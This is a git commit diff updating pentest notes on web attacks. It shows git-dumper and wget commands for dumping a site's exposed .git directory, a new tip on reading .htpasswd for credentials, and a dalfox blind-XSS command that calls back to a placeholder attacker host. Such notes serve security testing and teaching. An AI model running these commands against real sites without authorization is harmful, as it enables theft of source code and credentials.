updated XSS and others

hdks-bug · hdks-bug · commit f3c2ba3bc04d · 2025-02-27T19:52:35.000+09:00
diff --git a/src/exploit/web/dump-git-repository-from-website.md b/src/exploit/web/dump-git-repository-from-website.md
@@ -4,11 +4,22 @@ description: If we can have permission to access git repositoy in target website
 tags:
     - Web
 refs:
-date: 2023-07-06
+date: 2025-02-27
 draft: false
 ---
 
-## Dumping
+## Dumping with Git-Dumper
+
+[git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package.
+
+```bash
+pipx install git-dumper
+git-dumper https://example.com/.git ./dumped
+```
+
+<br />
+
+## Dumping with Wget
 
 We can simply use **`wget`** command in Linux to download the git repository.  
 After that, we can investigate files or all histories.
@@ -45,14 +56,3 @@ chmod +x extractor.sh
 
 Now we retrieve the entire git project from website.  
 It is stored in **“./new_example”** folder. We can investigate the repository.
-
-<br />
-
-## Dumping with Git-Dumper
-
-[git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package.
-
-```bash
-pip install git-dumper
-git-dumper https://example.com/.git ./dumped
-```
diff --git a/src/exploit/web/security-risk/broken-access-control.md b/src/exploit/web/security-risk/broken-access-control.md
@@ -4,7 +4,7 @@ description: The attacking methodology of broken access control in web applicati
 tags:
     - Web
 refs:
-date: 2024-12-06
+date: 2025-02-27
 draft: false
 ---
 
@@ -137,4 +137,11 @@ If there is another website that is owned by same orginazation, we may be able t
 
 ```bash
 https://example.com?url=https://admin.example.com/
-```
+```
+
+<br />
+
+## Read `.htpasswd`
+
+If the target website is protected with **Authorization (WWW-Authenticate)**, we may be able to get credentials by reading `.htpasswd` file in the web root.
+
diff --git a/src/exploit/web/security-risk/xss.md b/src/exploit/web/security-risk/xss.md
@@ -11,7 +11,7 @@ refs:
     - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
     - https://brutelogic.com.br/blog/building-xss-polyglots/
     - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-date: 2024-12-06
+date: 2025-02-27
 draft: false
 ---
 
@@ -25,7 +25,8 @@ draft: false
 
     # -X: Method
     # --data: POST data
-    dalfox url https://example.com/contact -X POST --data "email=test&message=test" -b http://<attack-ip>:<attack-port>
+    # -p: Specific parameter
+    dalfox url https://example.com/contact -X POST --data "email=test&message=test" -p message -b http://<attack-ip>:<attack-port>
     ```
 
 - [XSStrike](https://github.com/s0md3v/XSStrike)
